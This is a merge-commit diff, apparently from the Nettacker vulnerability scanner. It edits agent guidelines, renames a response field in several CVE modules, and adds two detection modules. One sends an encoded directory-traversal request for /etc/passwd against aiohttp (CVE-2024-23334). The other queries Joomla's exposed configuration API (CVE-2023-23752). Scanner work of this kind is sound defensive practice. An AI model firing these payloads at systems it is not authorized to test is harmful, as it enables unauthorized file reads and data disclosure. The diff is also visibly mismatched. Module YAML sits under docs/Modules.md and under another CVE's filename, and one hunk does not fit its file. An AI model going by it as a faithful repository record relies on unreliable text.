Merge branch 'master' into apsw-with-sqlalchemy

Signed-off-by: Achintya Jai <153343775+pUrGe12@users.noreply.github.com>

Author: pUrGe12

AGENTS.md

@@ -19,7 +19,7 @@ See https://agents.md for more info
 - Docker (web UI): `docker-compose up`.
 
 ## Coding Style & Naming Conventions
-- Python 3.9–3.12 supported. Use 4-space indents.
+- Python 3.10–3.12 supported. Use 4-space indents.
 - Line length: 99 chars (`ruff`, `ruff-format`, `isort` profile=black).
 - Names: modules/files `lower_snake_case`; functions/vars `lower_snake_case`; classes `PascalCase`; constants `UPPER_SNAKE_CASE`.
 - Keep functions small, typed where practical, and add docstrings for public APIs.
@@ -32,6 +32,8 @@ See https://agents.md for more info
 
 ## Commit & Pull Request Guidelines
 - Commit messages: imperative tense, concise subject; reference issues (`Fixes #123`).
+- Commit signing: all commits must be signed.
+- Formatting: use Ruff for Python linting and formatting.
 - Before pushing: `pre-commit run --all-files` and `make test` must pass.
 - PRs: include a clear description, rationale, linked issue(s), test evidence (logs or screenshots for web UI), and update docs if behavior changes.
 

docs/Modules.md

@@ -0,0 +1,55 @@
+info:
+  name: aiohttp_cve_2024_23334_vuln
+  author: Sankalp Bansal
+  severity: 7.5
+  description: aiohttp Directory Traversal (CVE-2024-23334) allowing arbitrary file read in versions 1.0.5 < v < 3.9.2
+  references:
+    - https://nvd.nist.gov/vuln/detail/cve-2024-23334
+    - https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f
+  profiles:
+    - vuln
+    - http
+    - high_severity
+    - cve
+    - cve2024
+    - aiohttp
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+              paths:
+                - "assets"
+                - "images"
+                - "public"
+                - "resources"
+                - "static"
+                - "media"
+                - "uploads"
+                - "build"
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "root:.*:0:0:"
+              reverse: false

nettacker/modules/vuln/aiohttp_cve_2024_23334.yaml

@@ -47,7 +47,7 @@ payloads:
             content:
               regex: "\"issuer\":"
               reverse: false
-            header:
+            headers:
               Content-type: 
                 regex: application/json
                 reverse: false

nettacker/modules/vuln/citrix_cve_2023_4966.yaml

@@ -43,7 +43,7 @@ payloads:
             status_code:
               regex: '200'
               reverse: false
-            header:
+            headers:
               Content-type: 
                 regex: text/html
                 reverse: false  

nettacker/modules/vuln/cloudron_cve_2021_40868.yaml

@@ -43,7 +43,7 @@ payloads:
             status_code:
               regex: '200'
               reverse: false
-            header:
+            headers:
               Content-type: 
                 regex: text/html
                 reverse: false

nettacker/modules/vuln/cyberoam_netgenie_cve_2021_38702.yaml

@@ -49,7 +49,7 @@ payloads:
             status_code:
               regex: '200'
               reverse: false
-            header:
+            headers:
               Content-type: 
                 regex: text/html
                 reverse: false

nettacker/modules/vuln/hoteldruid_cve_2021-37833.yaml

@@ -0,0 +1,53 @@
+info:
+  name: joomla_cve_2023_23752_vuln
+  author: janpreet
+  severity: 5.3
+  description: Joomla! CVE-2023-23752 - Unauthenticated information disclosure vulnerability allows attackers to access application configuration data through exposed REST API endpoints. Affected versions range from 4.0.0 to < 4.2.8
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
+    - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
+  profiles:
+    - vuln
+    - http
+    - medium_severity
+    - cve
+    - cve2023
+    - joomla
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:
+                - api/index.php/v1/config/application?public=true
+                - api/v1/config/application?public=true
+              schema:
+                - http
+                - https
+              ports:
+                - 80
+                - 443
+                - 8080
+                - 8443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "links.*data.*attributes"
+              reverse: false
+          log: "response_dependent['content']"

nettacker/modules/vuln/joomla_cve_2023_23752.yaml

@@ -43,7 +43,7 @@ payloads:
             status_code:
               regex: '200'
               reverse: false
-            header:
+            headers:
               Content-type: 
                 regex: text/html
                 reverse: false

nettacker/modules/vuln/justwirting_cve_2021_41878.yaml

@@ -47,7 +47,7 @@ payloads:
             status_code:
               regex: '200'
               reverse: false
-            header:
+            headers:
               Content-type: 
                 regex: text/html
                 reverse: false